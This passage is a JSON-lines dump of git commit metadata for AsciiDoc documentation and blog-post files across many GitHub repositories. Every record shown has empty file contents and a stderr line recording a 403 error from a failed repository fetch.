MDBs\n","repos":"iweiss\/wildfly,pferraro\/wildfly,iweiss\/wildfly,wildfly\/wildfly,iweiss\/wildfly,golovnin\/wildfly,jstourac\/wildfly,rhusar\/wildfly,pferraro\/wildfly,tadamski\/wildfly,tadamski\/wildfly,rhusar\/wildfly,xasx\/wildfly,pferraro\/wildfly,rhusar\/wildfly,jstourac\/wildfly,xasx\/wildfly,xasx\/wildfly,wildfly\/wildfly,iweiss\/wildfly,jstourac\/wildfly,pferraro\/wildfly,wildfly\/wildfly,rhusar\/wildfly,golovnin\/wildfly,golovnin\/wildfly,wildfly\/wildfly,jstourac\/wildfly,tadamski\/wildfly","old_file":"docs\/src\/main\/asciidoc\/_developer-guide\/ejb3\/Message_Driven_Beans_Controlled_Delivery.adoc","new_file":"docs\/src\/main\/asciidoc\/_developer-guide\/ejb3\/Message_Driven_Beans_Controlled_Delivery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly\/wildfly.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"0b5f2f8d66182af1a1094ad9ca4dc68caa183e10","subject":"Add missing link to app.asciidoc in guide index","message":"Add missing link to app.asciidoc in guide index\n","repos":"a12n\/erlang.mk,rabbitmq\/erlang.mk,ingwinlu\/erlang.mk,hairyhum\/erlang.mk,jj1bdx\/erlang.mk,ninenines\/erlang.mk,bsmr-erlang\/erlang.mk,crownedgrouse\/erlang.mk,KrzysiekJ\/erlang.mk,nevar\/erlang.mk","old_file":"doc\/src\/guide\/book.asciidoc","new_file":"doc\/src\/guide\/book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crownedgrouse\/erlang.mk.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"313224c6252af2f8be614fc70ae163ac64366606","subject":"Fix broken link for installing grafana","message":"Fix broken link for installing grafana\n","repos":"objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/hawkular-services\/docs\/quickstart-guide\/index.adoc","new_file":"src\/main\/jbake\/content\/hawkular-services\/docs\/quickstart-guide\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2fb8533965709e3cafc129b64d0e7046b1bc3c81","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/02\/18\/deref.adoc","new_file":"content\/news\/2022\/02\/18\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d1286fd9403bf62ee79518877ac2d35c20c73ead","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fcafde034b26743fa6aaa48c93915c0d873ad10","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c9929a08408023876eead6d3b9890507d7a0329","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca769e2d748eeb6678136a11ffe3c968245973db","subject":"Update 2010-12-14-Some-Programming-Nuggets.adoc","message":"Update 2010-12-14-Some-Programming-Nuggets.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2010-12-14-Some-Programming-Nuggets.adoc","new_file":"_posts\/2010-12-14-Some-Programming-Nuggets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa6a402673ad0b5eed5ea0c1dc97140892330197","subject":"Update 2018-06-13-Low-latency-Microservice.adoc","message":"Update 2018-06-13-Low-latency-Microservice.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-06-13-Low-latency-Microservice.adoc","new_file":"_posts\/2018-06-13-Low-latency-Microservice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f9691f1e11f37d99fe122c1767b8618729ad4b3","subject":"y2b create post Gears of War 3 Controller Unboxing (Xbox 360)","message":"y2b create post Gears of War 3 Controller Unboxing (Xbox 360)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-01-Gears-of-War-3-Controller-Unboxing-Xbox-360.adoc","new_file":"_posts\/2011-09-01-Gears-of-War-3-Controller-Unboxing-Xbox-360.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b487e269007c636b23c553f4e1dd05b7adff8765","subject":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38652a677eac308ca1e42245712644b85f190cd0","subject":"Update 2016-02-13-Managing-Python-dependencies-with-git-submodules.adoc","message":"Update 2016-02-13-Managing-Python-dependencies-with-git-submodules.adoc","repos":"Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io","old_file":"_posts\/2016-02-13-Managing-Python-dependencies-with-git-submodules.adoc","new_file":"_posts\/2016-02-13-Managing-Python-dependencies-with-git-submodules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kif11\/Kif11.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f584eed306af11755ff3eacd0b99edddee01f3f","subject":"Update 2018-02-10-Machine-Learning-Minutely-stock-price-prediction.adoc","message":"Update 2018-02-10-Machine-Learning-Minutely-stock-price-prediction.adoc","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2018-02-10-Machine-Learning-Minutely-stock-price-prediction.adoc","new_file":"_posts\/2018-02-10-Machine-Learning-Minutely-stock-price-prediction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"886267dd0f092857044f88932b695bd729b7dc35","subject":"Delete 2018-02-05-.adoc","message":"Delete 2018-02-05-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-.adoc","new_file":"_posts\/2018-02-05-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e769ed86330025676cd9cd5b7ca1f1ed38c13264","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d3eef6fa12a52150640dee06921f496167a9957","subject":"Update 2017-12-01-mov-to-gifanim.adoc","message":"Update 2017-12-01-mov-to-gifanim.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2017-12-01-mov-to-gifanim.adoc","new_file":"_posts\/2017-12-01-mov-to-gifanim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9c6cfadfacefe8564f95afaaac9c26bbee2b2a3","subject":"update 2009-04-17-VisualEditor-Eclipse-vs-Matisse-Netbeans.adoc","message":"update 2009-04-17-VisualEditor-Eclipse-vs-Matisse-Netbeans.adoc\n","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2009-04-17-VisualEditor-Eclipse-vs-Matisse-Netbeans.adoc","new_file":"_posts\/2009-04-17-VisualEditor-Eclipse-vs-Matisse-Netbeans.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cf7640f334ec5dad26d826eb526fa705be767b6","subject":"Update 2016-03-16-c1114.adoc","message":"Update 2016-03-16-c1114.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-03-16-c1114.adoc","new_file":"_posts\/2016-03-16-c1114.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3bcc5ac2fd4f2defe08810bd82e936eb4a89c5f","subject":"Update 2016-7-2-thinphp.adoc","message":"Update 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-2-thinphp.adoc","new_file":"_posts\/2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1792db9c511844744f366c5d4f34de190253c56b","subject":"Fix Documentacion.","message":"Fix Documentacion.\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/fermat_dap\/flujo general\/version1.asciidoc","new_file":"fermat-documentation\/fermat_dap\/flujo general\/version1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea052980879c307da5745f2d846deb9e9b87be06","subject":"[DOCS] Fixed bad link","message":"[DOCS] Fixed bad link\n\nOriginal commit: elastic\/x-pack-elasticsearch@bb733b7877af84fcfe5691272eea3df97e089a90\n","repos":"gingerwizard\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/en\/installing-xes.asciidoc","new_file":"docs\/en\/installing-xes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87b5c981befba705e5a60524732d5042864190ae","subject":"y2b create post The Coolest Phone You\u2019ve Never Heard Of\u2026","message":"y2b create post The Coolest Phone You\u2019ve Never Heard Of\u2026","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-13-The-Coolest-Phone-Youve-Never-Heard-Of.adoc","new_file":"_posts\/2017-08-13-The-Coolest-Phone-Youve-Never-Heard-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12bee696ed7007210f52d4f2aa30c97a7117dc87","subject":"Delete the file at '_posts\/2017-03-23-One-Time-Pad-by-Z3.adoc'","message":"Delete the file at '_posts\/2017-03-23-One-Time-Pad-by-Z3.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-03-23-One-Time-Pad-by-Z3.adoc","new_file":"_posts\/2017-03-23-One-Time-Pad-by-Z3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e48f60a89b2793ef7830317d17d1575d7c57bf1b","subject":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","message":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"394d1a51dc14359518003a1a80345d79ae758191","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0d081595a0ca84759b26fa2277cc77b0e25b8f4","subject":"Update 2017-05-28-E-S-API.adoc","message":"Update 2017-05-28-E-S-API.adoc","repos":"Jekin6\/blog,Jekin6\/blog,Jekin6\/blog,Jekin6\/blog","old_file":"_posts\/2017-05-28-E-S-API.adoc","new_file":"_posts\/2017-05-28-E-S-API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Jekin6\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1a0380768ca6e004cd976e84ead5ceffefbbfdc","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aabe106a9ab18fbd798116acb7fee7f32fd628b5","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19ce6594b8e53188bb273130d8167fe17ae72d62","subject":"Update 2015-02-06-the-memory-of-2014.adoc","message":"Update 2015-02-06-the-memory-of-2014.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-02-06-the-memory-of-2014.adoc","new_file":"_posts\/2015-02-06-the-memory-of-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f644e7c3a667f37c63d29270dbaaa124e8474b92","subject":"Update 2015-10-02-When-Epiales-Calls.adoc","message":"Update 2015-10-02-When-Epiales-Calls.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0e6c1bdf0ec8fa754337cb8346c86f8aee619c0","subject":"y2b create post HOLIDAY TECH DEALS","message":"y2b create post HOLIDAY TECH DEALS","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-27-HOLIDAY-TECH-DEALS.adoc","new_file":"_posts\/2015-11-27-HOLIDAY-TECH-DEALS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2cc051c15f5e14d8faf4dbf6263681c5114aadf9","subject":"Update 2016-09-26-GDG-Summit-ES-2016.adoc","message":"Update 2016-09-26-GDG-Summit-ES-2016.adoc","repos":"acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io","old_file":"_posts\/2016-09-26-GDG-Summit-ES-2016.adoc","new_file":"_posts\/2016-09-26-GDG-Summit-ES-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acien101\/acien101.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8937e1e64c210b0ea0fc8320ac5fe58d7844bb1a","subject":"Update 2017-07-02-Continuous-learnig.adoc","message":"Update 2017-07-02-Continuous-learnig.adoc\n","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2017-07-02-Continuous-learnig.adoc","new_file":"_posts\/2017-07-02-Continuous-learnig.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5609a5db1028cd363076b3fca848bf84454e0a0b","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e57d7547b6541448e62191b7e3c6ab6c8c007fbb","subject":"#2246 add document for application properties guide","message":"#2246 add document for application properties guide\n\n","repos":"metatron-app\/metatron-discovery,metatron-app\/metatron-discovery,metatron-app\/metatron-discovery,metatron-app\/metatron-discovery,metatron-app\/metatron-discovery,metatron-app\/metatron-discovery,metatron-app\/metatron-discovery","old_file":"discovery-server\/src\/main\/asciidoc\/application-config-guide.adoc","new_file":"discovery-server\/src\/main\/asciidoc\/application-config-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/metatron-app\/metatron-discovery.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"548e4c310e4a28252cc5eb56eea5e3d590f57c64","subject":"Aggiunta del testo","message":"Aggiunta del testo","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"d19b1e5c7ab2ff24724be04b1576019a692860e3","subject":"Update 2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","message":"Update 2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","new_file":"_posts\/2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26355eb09f8bc1ad8e0c3e85cca1b1d91124fd1d","subject":"Update 2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","message":"Update 2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_file":"_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f1ae270ab8e4d1a528cad750fee9e7d4f3f3582","subject":"Issue #4 Processes section finished.","message":"Issue #4 Processes section finished.\n","repos":"uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain","old_file":"doc\/development\/software-process.adoc","new_file":"doc\/development\/software-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e5a3f3df0df5b6c491f598f8b06abdda288b5355","subject":"Update 2015-07-23-Lorem-ipsum.adoc","message":"Update 2015-07-23-Lorem-ipsum.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-07-23-Lorem-ipsum.adoc","new_file":"_posts\/2015-07-23-Lorem-ipsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36a86a09c68ffafefd9fa2ba2d186ef9ff5153b4","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d71acda07a256bc7261437db42a158386c00a00","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 